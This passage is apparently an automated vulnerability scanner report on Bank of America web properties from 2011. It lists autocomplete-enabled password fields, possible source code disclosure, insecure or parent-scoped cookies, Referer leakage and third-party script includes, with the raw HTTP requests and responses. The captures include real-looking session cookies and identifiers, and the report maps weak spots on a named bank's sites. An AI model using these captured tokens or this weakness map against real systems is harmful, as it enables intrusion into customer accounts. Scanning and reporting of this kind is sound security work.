X-Powered-By: ASP.NET
Date: Thu, 06 Oct 2011 14:16:19 GMT
Content-Length: 30965

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>
<title>Bank of America | Privacy Assist | Personal Identification Number</title>
<meta name="descripti
...[SNIP]...
<link rel="stylesheet" type="text/css" href="../../stylesheets/intersections.css">
   <form name="frmSignup" action="../../pages/English/LocateMember.asp" method="Post">
       <input name="hdnPageModified" type="hidden" value="No">
...[SNIP]...
</label><input type="password" NAME="txtSSN1" id="SSN1" SIZE="3" tabindex="15" maxlength="3" onChange="valueSecurityChanged(this, true)" onFocus="SelectText(this)" value=""> -
               <label for="SSN2">
...[SNIP]...
</label><input type="password" NAME="txtSSN2" id="SSN2" SIZE="2" tabindex="16" maxlength="2" onChange="valueSecurityChanged(this, true)" onFocus="SelectText(this)" value=""> -
               <label for="SSN3">
...[SNIP]...
</label><input type="password" NAME="txtSSN3" id="SSN3" SIZE="4" tabindex="17" maxlength="4" onChange="valueSecurityChanged(this, true)" onFocus="SelectText(this)" value="">
           </TD>
...[SNIP]...

5.2. https://www9.bankofamerica.com/mortgage/status/mymortgage-signin.go previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www9.bankofamerica.com
Path:	/mortgage/status/mymortgage-signin.go

Issue detail

The page contains a form with the following action URL:

https://www9.bankofamerica.com/mortgage/status/mymortgage-signin.go

The form contains the following password fields with autocomplete enabled:

myMortgage.user.prospectOnlinePassword
myMortgage.user.newPasscode
myMortgage.user.reenterPasscode

Request

GET /mortgage/status/mymortgage-signin.go HTTP/1.1
Host: www9.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 06 Oct 2011 13:41:26 GMT
Server: IBM_HTTP_Server
Cache-Control: no-cache
Via: On-Demand Router/1.0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 40090

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<head>

...[SNIP]...
<div>
<form id="mymortgage_signin" name="FulfillmentSignIn" action="/mortgage/status/mymortgage-signin.go" method="post">        <div>
...[SNIP]...
<div>

<input type="password" name="myMortgage.user.prospectOnlinePassword" size="22" maxlength="20" id="myMortgage.user.prospectOnlinePassword" onchange="validate(this,'',true);"/>
                           <a title="Click here if you forgot your Passcode" name="Click_here_if_you_forgot_your_Passcode" href="signin-forgot-local-passcode.go">
...[SNIP]...
<div>

<input type="password" name="myMortgage.user.newPasscode" size="22" maxlength="20" id="myMortgage.user.newPasscode" onfocus="return fnCheckPasscodeStrengthIndicator(this.value,1)" onkeypress="capsDetect(event);" onkeyup="return fnCheckPasscodeStrengthIndicator(this.value,1)" onchange="validate(this,'',true);"/>
                           </div>
...[SNIP]...
<div>

<input type="password" name="myMortgage.user.reenterPasscode" size="22" maxlength="20" id="myMortgage.user.reenterPasscode" onkeyup="return fnCheckReenterPasscodeStrengthIndicator(this.value,1)" onchange="validate(this,'',true);"/>
                           </div>
...[SNIP]...

6. Source code disclosure previous next
There are 2 instances of this issue:

/home-loans/surveyShowAction.go
/insurance/surveyShowAction.go

Issue background

Server-side source code may contain sensitive information which can help an attacker formulate attacks against the application.

Issue remediation

Server-side source code is normally disclosed to clients as a result of typographical errors in scripts or because of misconfiguration, such as failing to grant executable permissions to a script or directory. You should review the cause of the code disclosure and prevent it from happening.

6.1. https://www9.bankofamerica.com/home-loans/surveyShowAction.go previous next

Summary

Severity:	Low
Confidence:	Tentative
Host:	https://www9.bankofamerica.com
Path:	/home-loans/surveyShowAction.go

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /home-loans/surveyShowAction.go HTTP/1.1
Host: www9.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 06 Oct 2011 13:00:27 GMT
Server: IBM_HTTP_Server
Cache-Control: no-cache
Content-Length: 6062
Set-Cookie: SURVEY_SHOWN_IN_LAST_6_MONTHS=""; Expires=Tue, 03 Apr 2012 13:00:26 GMT; Path=/; Domain=.bankofamerica.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Via: On-Demand Router/1.0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<head>

   <title>Survey Launcher</title>
   <meta name="Description" CONTENT="">

<link rel="canonical" href="https://www
...[SNIP]...
<!--
       var env = "<%= environment%>";
       if (env == "PROD") {
           cmSetProduction();
       } else if (env == "STAGE" || env == "SIT") {
           cmSetStaging();
       }

       var cmError = false;

       cmCreatePageviewTag( null,
                           'Unknown',

...[SNIP]...

6.2. https://www9.bankofamerica.com/insurance/surveyShowAction.go previous next

Summary

Severity:	Low
Confidence:	Tentative
Host:	https://www9.bankofamerica.com
Path:	/insurance/surveyShowAction.go

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /insurance/surveyShowAction.go HTTP/1.1
Host: www9.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 06 Oct 2011 13:00:22 GMT
Server: IBM_HTTP_Server
X-FRAME-OPTIONS: SAMEORIGIN
Cache-Control: no-cache
Content-Length: 5792
Set-Cookie: SURVEY_SHOWN_IN_LAST_6_MONTHS=""; Expires=Tue, 03 Apr 2012 13:00:21 GMT; Path=/; Domain=.bankofamerica.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Via: On-Demand Router/1.0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<head>

<title>Survey Launcher</title>
<link rel="canonical" href="https://www8.bankofamerica.com/ContentWeb/cor
...[SNIP]...
<!--
       var env = "<%= environment%>";
       if (env == "PROD") {
           cmSetProduction();
       } else if (env == "STAGE" || env == "SIT") {
           cmSetStaging();
       }

       var cmError = false;

       cmCreatePageviewTag( null,
                           'Unknown',

...[SNIP]...

7. SSL cookie without secure flag set previous next
There are 4 instances of this issue:

https://www2.bankofamerica.com/deposits/checksave/olbextended/index.cfm
https://www9.bankofamerica.com/home-loans/mortgage-purchase.go
https://www9.bankofamerica.com/home-loans/surveyShowAction.go
https://www9.bankofamerica.com/insurance/surveyShowAction.go

Issue background

If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.

Issue remediation

The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.

7.1. https://www2.bankofamerica.com/deposits/checksave/olbextended/index.cfm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www2.bankofamerica.com
Path:	/deposits/checksave/olbextended/index.cfm

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

bac_persist=3041310379.47873.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

7.2. https://www9.bankofamerica.com/home-loans/mortgage-purchase.go previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www9.bankofamerica.com
Path:	/home-loans/mortgage-purchase.go

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

ORIGINATIONS.BANKOFAMERICA.COM=NVH9yAytgRfRe9B2T5E5DnJSp5UQQCJEe1V1MMuuqFhMv1nEWYrMuP+/kgpQ40hdqnZF9hug8mIY3QPj7KEn0YgTL04RIZV+a0Ajm1e9+GzdAk9f+cJSOsx4R41b1wwCGMdnxtGnFYcLLS4d0z1cVF6+Eadv4AI9+bNPv01vshxlZTgPSXNNZwboayRUVJc8EVeQMImPZgUdhtBeLKW4JXjsjhtMBpdvWxy/US6Q2nS88C2FauT066xHiMY2SsLR3p7WQpFbtuUl0vJm5f5Gt1GoVOJnXXfIQtYGZ88/jMIUeDn0VIPIj14ESopT5jmKrcAXb7xIj67CZIi6U/51S8dduhgi0ysC3fSV1SfAcARcnDbZ6BQQfHYxACjVEeuI5aZ/E6XgzlzfXowxgSiv33laZECGFyhCxSQPG/VHBg+ncz9NKOm3bqtUoxC7mmihAedmYO2XudnvWKZc6jz9I/TVSJNdSVwZpCBsTmbJnhVSNVJgG7SH5LGXoyywRrSog5d9VAHEw/bmPePxAOUiC/zAmxxDcqBVN6aEqZJdVlZLMiG6HpVXshVGonkEv5J5k14qsR79fahnqulfNjKlqxpBfdqqdFp9Kx7YqmM+dM5ofD3FgqVRWmMk59qcGkDn; Path=/; Domain=.bankofamerica.com
ORIGINATIONS.BANKOFAMERICA.COM=NVH9yAytgRfRe9B2T5E5DnJSp5UQQCJEe1V1MMuuqFhMv1nEWYrMuP+/kgpQ40hdqnZF9hug8mIY3QPj7KEn0YgTL04RIZV+a0Ajm1e9+GzdAk9f+cJSOsx4R41b1wwCGMdnxtGnFYcLLS4d0z1cVF6+Eadv4AI9+bNPv01vshxlZTgPSXNNZwboayRUVJc8EVeQMImPZgUdhtBeLKW4JXjsjhtMBpdvWxy/US6Q2nS88C2FauT066xHiMY2SsLR3p7WQpFbtuUl0vJm5f5Gt1GoVOJnXXfIQtYGZ88/jMIUeDn0VIPIj14ESopT5jmKrcAXb7xIj67CZIi6U/51S8dduhgi0ysC3fSV1SfAcARcnDbZ6BQQfHYxACjVEeuI5aZ/E6XgzlzfXowxgSiv33laZECGFyhCxSQPG/VHBg+ncz9NKOm3bqtUoxC7mmihAedmYO2XudnvWKZc6jz9I/TVSJNdSVwZpCBsTmbJnhVSNVJgG7SH5LGXoyywRrSog5d9VAHEw/bmPePxAOUiC/zAmxxDcqBVN6aEqZJdVlZLMiG6HpVXshVGonkEv5J5k14qsR79fahnqulfNjKlqxpBfdqqdFp9Kx7YqmM+dM5ofD3FgqVRWmMk59qcGkDn; Path=/; Domain=.bankofamerica.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /home-loans/mortgage-purchase.go HTTP/1.1
Host: www9.bankofamerica.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://www.bankofamerica.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=210832650.108559369.1317146892.1317146892.1317146892.1; __utmz=210832650.1317146892.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SURVEY_SHOWN_IN_LAST_6_MONTHS=N; CM_RegCustID=20110927:0:O:7779c380-132a-a87a-48565017779c3801; BOA_COM_BT_ELIGIBLE=No; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; hp_pf_anon=anon=((ct=+||fn=+||lang=en_US||st=+||zc=+)); BOA_0020=20110927:0:O:7779c380-132a-a87a-48565017779c3801; WAOR=1717870507.281.0000; cmTPSet=Y; TCID=0007b16b-f1e9-be5a-87b0-cd4a0000001e; SMIDENTITY=BOjgHh7pIR9VuQaUQOGrSuU44ScdfTCeoBcqkA62znxyHHVi7phxb1ABWeIEVtOLpq05ENXE4JU6JqCSamUKelXrP/zUi25oimxc8a6Pt1SEbC3lP+090dyFE0lXa6kgFM1htaCbvrILjjCIS5yEaXSPlREFJMlGTsTa6aSz+tDAPZLlPjhFyXKZTvW4e1E1G3hQKZ6DrmtfZli3PXeawL2yB+QbzvCGWgw0Jwoo5RU8Rf3H8JaI0jsK4eih6Q93avGLATZa4osn+GE5LgtxEWwmQRGQ5eYd27NhT9ibkdZejrfMe4vS9wq/YVPxFzw9lublol9S5txrJW0fbXfsokdEWSJqdWY03C1YWUp/Nz37cOe8AdRyedDGnrPfsXjXASHAivqQQDrIu2vx7/JpT/5GzDHaX/8PC/ncQgtGKjzqF+q7LhyvahfFyP9awUweg+EAEGP4UjR7OdiD1IDWAoHsFLF2IbI9pph++w73rwg8cZOk+jW047J75kFUUDqv; mbox=check#true#1317905950|session#1317905889373-229814#1317907750; BOA_ADVISOR=SAV%3A2; GMDEALER=false; GMDEALERSECURE=false; GMREFERRAL=false; GMREFERRALSECURE=false; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNYNNNNN; TLTSID=AB41EFC4F01A10F02BCAA1CC4F75D944; TLTUID=AB41EFC4F01A10F02BCAA1CC4F75D944; state=CT; JSESSIONID=0000RTNuokUto4PXIF7QXQuMceW:14b1t9p98; NSC_CbolPgBnfsjdb=445b32097852; throttle_value=72

Response

7.3. https://www9.bankofamerica.com/home-loans/surveyShowAction.go previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www9.bankofamerica.com
Path:	/home-loans/surveyShowAction.go

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

SURVEY_SHOWN_IN_LAST_6_MONTHS=Survey; Expires=Tue, 03 Apr 2012 13:41:25 GMT; Path=/; Domain=.bankofamerica.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

7.4. https://www9.bankofamerica.com/insurance/surveyShowAction.go previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www9.bankofamerica.com
Path:	/insurance/surveyShowAction.go

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

SURVEY_SHOWN_IN_LAST_6_MONTHS=Survey; Expires=Tue, 03 Apr 2012 13:40:40 GMT; Path=/; Domain=.bankofamerica.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /insurance/surveyShowAction.go?SurveyName=Survey&SurveyUrl=https://bankofamerica.researchhq.com/onlinebanking/index.php?cust@eq@inpa@amp@custid@eq@&SurveyDimensions=scrollbars@eq@yes HTTP/1.1
Host: www9.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

8. Cookie scoped to parent domain previous next
There are 3 instances of this issue:

/home-loans/mortgage-purchase.go
/home-loans/surveyShowAction.go
/insurance/surveyShowAction.go

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.

8.1. https://www9.bankofamerica.com/home-loans/mortgage-purchase.go previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www9.bankofamerica.com
Path:	/home-loans/mortgage-purchase.go

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

ORIGINATIONS.BANKOFAMERICA.COM=NVH9yAytgRfRe9B2T5E5DnJSp5UQQCJEe1V1MMuuqFhMv1nEWYrMuP+/kgpQ40hdqnZF9hug8mIY3QPj7KEn0YgTL04RIZV+a0Ajm1e9+GzdAk9f+cJSOsx4R41b1wwCGMdnxtGnFYcLLS4d0z1cVF6+Eadv4AI9+bNPv01vshxlZTgPSXNNZwboayRUVJc8EVeQMImPZgUdhtBeLKW4JXjsjhtMBpdvWxy/US6Q2nS88C2FauT066xHiMY2SsLR3p7WQpFbtuUl0vJm5f5Gt1GoVOJnXXfIQtYGZ88/jMIUeDn0VIPIj14ESopT5jmKrcAXb7xIj67CZIi6U/51S8dduhgi0ysC3fSV1SfAcARcnDbZ6BQQfHYxACjVEeuI5aZ/E6XgzlzfXowxgSiv33laZECGFyhCxSQPG/VHBg+ncz9NKOm3bqtUoxC7mmihAedmYO2XudnvWKZc6jz9I/TVSJNdSVwZpCBsTmbJnhVSNVJgG7SH5LGXoyywRrSog5d9VAHEw/bmPePxAOUiC/zAmxxDcqBVN6aEqZJdVlZLMiG6HpVXshVGonkEv5J5k14qsR79fahnqulfNjKlqxpBfdqqdFp9Kx7YqmM+dM5ofD3FgqVRWmMk59qcGkDn; Path=/; Domain=.bankofamerica.com
ORIGINATIONS.BANKOFAMERICA.COM=NVH9yAytgRfRe9B2T5E5DnJSp5UQQCJEe1V1MMuuqFhMv1nEWYrMuP+/kgpQ40hdqnZF9hug8mIY3QPj7KEn0YgTL04RIZV+a0Ajm1e9+GzdAk9f+cJSOsx4R41b1wwCGMdnxtGnFYcLLS4d0z1cVF6+Eadv4AI9+bNPv01vshxlZTgPSXNNZwboayRUVJc8EVeQMImPZgUdhtBeLKW4JXjsjhtMBpdvWxy/US6Q2nS88C2FauT066xHiMY2SsLR3p7WQpFbtuUl0vJm5f5Gt1GoVOJnXXfIQtYGZ88/jMIUeDn0VIPIj14ESopT5jmKrcAXb7xIj67CZIi6U/51S8dduhgi0ysC3fSV1SfAcARcnDbZ6BQQfHYxACjVEeuI5aZ/E6XgzlzfXowxgSiv33laZECGFyhCxSQPG/VHBg+ncz9NKOm3bqtUoxC7mmihAedmYO2XudnvWKZc6jz9I/TVSJNdSVwZpCBsTmbJnhVSNVJgG7SH5LGXoyywRrSog5d9VAHEw/bmPePxAOUiC/zAmxxDcqBVN6aEqZJdVlZLMiG6HpVXshVGonkEv5J5k14qsR79fahnqulfNjKlqxpBfdqqdFp9Kx7YqmM+dM5ofD3FgqVRWmMk59qcGkDn; Path=/; Domain=.bankofamerica.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /home-loans/mortgage-purchase.go HTTP/1.1
Host: www9.bankofamerica.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://www.bankofamerica.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=210832650.108559369.1317146892.1317146892.1317146892.1; __utmz=210832650.1317146892.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SURVEY_SHOWN_IN_LAST_6_MONTHS=N; CM_RegCustID=20110927:0:O:7779c380-132a-a87a-48565017779c3801; BOA_COM_BT_ELIGIBLE=No; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; hp_pf_anon=anon=((ct=+||fn=+||lang=en_US||st=+||zc=+)); BOA_0020=20110927:0:O:7779c380-132a-a87a-48565017779c3801; WAOR=1717870507.281.0000; cmTPSet=Y; TCID=0007b16b-f1e9-be5a-87b0-cd4a0000001e; SMIDENTITY=BOjgHh7pIR9VuQaUQOGrSuU44ScdfTCeoBcqkA62znxyHHVi7phxb1ABWeIEVtOLpq05ENXE4JU6JqCSamUKelXrP/zUi25oimxc8a6Pt1SEbC3lP+090dyFE0lXa6kgFM1htaCbvrILjjCIS5yEaXSPlREFJMlGTsTa6aSz+tDAPZLlPjhFyXKZTvW4e1E1G3hQKZ6DrmtfZli3PXeawL2yB+QbzvCGWgw0Jwoo5RU8Rf3H8JaI0jsK4eih6Q93avGLATZa4osn+GE5LgtxEWwmQRGQ5eYd27NhT9ibkdZejrfMe4vS9wq/YVPxFzw9lublol9S5txrJW0fbXfsokdEWSJqdWY03C1YWUp/Nz37cOe8AdRyedDGnrPfsXjXASHAivqQQDrIu2vx7/JpT/5GzDHaX/8PC/ncQgtGKjzqF+q7LhyvahfFyP9awUweg+EAEGP4UjR7OdiD1IDWAoHsFLF2IbI9pph++w73rwg8cZOk+jW047J75kFUUDqv; mbox=check#true#1317905950|session#1317905889373-229814#1317907750; BOA_ADVISOR=SAV%3A2; GMDEALER=false; GMDEALERSECURE=false; GMREFERRAL=false; GMREFERRALSECURE=false; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNYNNNNN; TLTSID=AB41EFC4F01A10F02BCAA1CC4F75D944; TLTUID=AB41EFC4F01A10F02BCAA1CC4F75D944; state=CT; JSESSIONID=0000RTNuokUto4PXIF7QXQuMceW:14b1t9p98; NSC_CbolPgBnfsjdb=445b32097852; throttle_value=72

Response

8.2. https://www9.bankofamerica.com/home-loans/surveyShowAction.go previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www9.bankofamerica.com
Path:	/home-loans/surveyShowAction.go

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

SURVEY_SHOWN_IN_LAST_6_MONTHS=Survey; Expires=Tue, 03 Apr 2012 13:41:25 GMT; Path=/; Domain=.bankofamerica.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

8.3. https://www9.bankofamerica.com/insurance/surveyShowAction.go previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www9.bankofamerica.com
Path:	/insurance/surveyShowAction.go

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

SURVEY_SHOWN_IN_LAST_6_MONTHS=Survey; Expires=Tue, 03 Apr 2012 13:40:40 GMT; Path=/; Domain=.bankofamerica.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /insurance/surveyShowAction.go?SurveyName=Survey&SurveyUrl=https://bankofamerica.researchhq.com/onlinebanking/index.php?cust@eq@inpa@amp@custid@eq@&SurveyDimensions=scrollbars@eq@yes HTTP/1.1
Host: www9.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

9. Cross-domain Referer leakage previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://homeloans.bankofamerica.com
Path:	/en/home.jsp

Issue detail

The page was loaded from a URL containing a query string:

http://homeloans.bankofamerica.com/en/home.jsp?q=Bank+of+America+sucks

The response contains the following links to other domains:

http://ajax.googleapis.com/ajax/libs/swfobject/2.1/swfobject.js
http://fls.doubleclick.net/activityi;src=1359940;type=mortc418;cat=homep053;ord=1?

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.

Request

GET /en/home.jsp?q=Bank+of+America+sucks HTTP/1.1
Host: homeloans.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 06 Oct 2011 14:14:48 GMT
Pragma:
Cache-Control: max-age=1800, public
Expires: Thu, 6 Oct 2011 14:44:48 GMT
Last-Modified: Tue, 27 Sep 2011 18:30:13 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 27134
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"><head><meta content="tex
...[SNIP]...
<meta name="google-site-verification" content="w_aPC7FY1aXXQNDVNWnsN5fw6TKKB9XIUhqNJ76oAdE" />
<script src="http://ajax.googleapis.com/ajax/libs/swfobject/2.1/swfobject.js" type="text/javascript"></script>
...[SNIP]...
<noscript><iframe src="http://fls.doubleclick.net/activityi;src=1359940;type=mortc418;cat=homep053;ord=1?" width="1" height="1" frameborder="0"></iframe>
...[SNIP]...

10. Cross-domain script include previous next
There are 25 instances of this issue:

http://factsaboutfees.bankofamerica.com/
http://factsaboutfees.bankofamerica.com/manage-credit-card-fees/transaction-fees-and-aprs/
http://homeloans.bankofamerica.com/en/community-support.html
http://homeloans.bankofamerica.com/en/home-loan-experience.html
http://homeloans.bankofamerica.com/en/home-loan-options.html
http://homeloans.bankofamerica.com/en/home-loan-options/borrow/cash-out-refinancing.html
http://homeloans.bankofamerica.com/en/home-loan-options/borrow/home-equity-line-of-credit.html
http://homeloans.bankofamerica.com/en/home-loan-options/borrow/home-equity-loan.html
http://homeloans.bankofamerica.com/en/home-loan-options/buy/15-year-fixed-rate-mortgage.html
http://homeloans.bankofamerica.com/en/home-loan-options/buy/30-year-fixed-rate-mortgage.html
http://homeloans.bankofamerica.com/en/home-loan-options/buy/5-1-adjustable-rate-mortgage.html
http://homeloans.bankofamerica.com/en/home-loan-options/other-options/additional-loans-and-programs.html
http://homeloans.bankofamerica.com/en/home-loan-options/refinance/15-year-fixed-rate-mortgage.html
http://homeloans.bankofamerica.com/en/home-loan-options/refinance/30-year-fixed-rate-mortgage.html
http://homeloans.bankofamerica.com/en/home-loan-options/refinance/5-1-adjustable-rate-mortgage.html
http://homeloans.bankofamerica.com/en/home-loan-options/refinance/cash-out-refinancing.html
http://homeloans.bankofamerica.com/en/home.html
http://homeloans.bankofamerica.com/en/home.jsp
http://homeloans.bankofamerica.com/en/learning-center/glossary.html
http://homeloans.bankofamerica.com/en/our-commitment.html
http://homeloans.bankofamerica.com/en/service-and-support.html
http://homeloans.bankofamerica.com/en/service-and-support/homeowner-relief/find-a-solution.html
http://homeloans.bankofamerica.com/en/site-map.html
http://homeloans.bankofamerica.com/es/home.html
http://homeloans.bankofamerica.com/favicon.ico

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.

10.1. http://factsaboutfees.bankofamerica.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://factsaboutfees.bankofamerica.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://amch.questionmarket.com/adsc/d684383/2/685277/randm.js
http://amch.questionmarket.com/adsc/d684383/3/685278/randm.js

Request

Response

HTTP/1.1 200 OK
Date: Thu, 06 Oct 2011 14:12:58 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 34783
Set-Cookie: NSC_mfbso.cbolpgbnfsjdb.dpn=ffffffff09c9029445525d5f4f58455e445a4a423660;expires=Thu, 06-Oct-2011 15:12:59 GMT;path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xm
...[SNIP]...

   <script type="text/javascript" src="http://amch.questionmarket.com/adsc/d684383/2/685277/randm.js"></script>
   
   <script type="text/javascript" src="http://amch.questionmarket.com/adsc/d684383/3/685278/randm.js"></script>
...[SNIP]...

10.2. http://factsaboutfees.bankofamerica.com/manage-credit-card-fees/transaction-fees-and-aprs/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://factsaboutfees.bankofamerica.com
Path:	/manage-credit-card-fees/transaction-fees-and-aprs/

Issue detail

The response dynamically includes the following scripts from other domains:

http://amch.questionmarket.com/adsc/d684383/2/685277/randm.js
http://amch.questionmarket.com/adsc/d684383/3/685278/randm.js

Request

Response

HTTP/1.1 200 OK
Date: Thu, 06 Oct 2011 14:13:27 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 53700
Set-Cookie: NSC_mfbso.cbolpgbnfsjdb.dpn=ffffffff09c9029445525d5f4f58455e445a4a423660;expires=Thu, 06-Oct-2011 15:13:27 GMT;path=/

